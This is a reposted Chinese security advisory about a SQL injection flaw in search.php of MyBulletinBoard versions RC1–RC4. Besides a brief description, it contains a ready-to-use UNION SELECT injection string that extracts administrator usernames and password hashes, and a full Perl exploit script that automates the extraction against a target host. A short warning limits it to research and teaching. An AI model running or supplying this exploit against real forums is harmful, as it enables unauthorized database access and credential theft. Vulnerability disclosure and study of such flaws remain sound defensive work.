MyBulletinBoard search.php远程SQL注入漏洞

2008-04-09 04:15:17来源:互联网 阅读 ()

新老客户大回馈,云服务器低至5折

MyBulletinBoard search.php远程SQL注入漏洞

发布日期:2005-08-22
更新日期:2005-08-22

受影响系统:
MyBB MyBB rc4
MyBB MyBB rc3
MyBB MyBB rc2
MyBB MyBB rc1
描述:
BUGTRAQ ID: 14615

MyBulletinBoard是一款用PHP和MySQL开发的论坛程序。

MyBulletinBoard中存在SQL注入漏洞,远程攻击者可以利用这个漏洞完全控制基础数据库系统。

起因是没有正确的过滤用户输入。

<*来源:s2b (s2b@hotmail.com)
HACKERS PAL
Devil-00
ABDUCTER

链接:http://marc.theaimsgroup.com/?l=bugtraq&m=112448791006470&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

search.php?action=finduser&uid=-1' UNION SELECT uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,username,password FROM mybb_users where usergroup=4/*


#!/usr/bin/perl -w
use LWP::Simple;
if(!$ARGV[0] or !$ARGV[1] or !$ARGV[2]){
print "#################[ MyBB SQL-Injection ]############################\n";
print "# Coded By Devil-00 [ sTranger-killer ] #\n";
print "# Exmp:- mybb.pl www.victem.com mybb 0 0 || To Get Search ID #\n";
print "# Exmp:- mybb.pl www.victem.com mybb searchid 1 || To Get MD5 Hash #\n";
print "# Thnx For [ Xion - HACKERS PAL - ABDUCTER ] #\n";
print "################################################## #################\n";
exit;
}

my $host = 'http://'.$ARGV[0];
my $searchid = $ARGV[2];

if($ARGV[3] eq 0){
print "[*] Trying $host\n";

$url = "/".$ARGV[1]."/search.php?action=finduser&uid=-1' UNION SELECT \
uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,ui d,uid,uid,username,password FROM \
mybb_users where usergroup=4 and uid=1/*"; $page = get($host.$url) || die "[-] \
Unable to retrieve: $!"; print "[ ] Connected to: $host\n";
$page =~ m/<a href="search\.php\?action=results&sid=(.*?)&sortby=&order=">/ && print \
"[ ] Search ID To Use : $1\n"; exit;
}else{

print "[*] Trying $host\n";

$url = "/".$ARGV[1]."/search.php?action=results&sid=$searchid&sortby=&order=";
$page = get($host.$url) || die "[-] Unable to retrieve: $!";
print "[ ] Connected to: $host\n";
$page =~ m/<a href="member\.php\?action=profile&amp\;uid=1">(.*?)<\/a>/ && print \
"[ ] User ID is: $1\n"; print "[-] Unable to retrieve User ID\n" if(!$1);
$page =~ m/<a href="forumdisplay\.php\?fid=1">(.*?)<\/a>/ && print "[ ] MD5 hash of \
password is: $1\n"; print "[-] Unable to retrieve hash of password\n" if(!$1);
}

建议:
厂商补丁:

MyBB
----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.mybboard.com/

标签:

版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有

上一篇:OpenVPN多个拒绝服务漏洞

下一篇:Woltlab Burning Board modcp.php远程SQL注入漏洞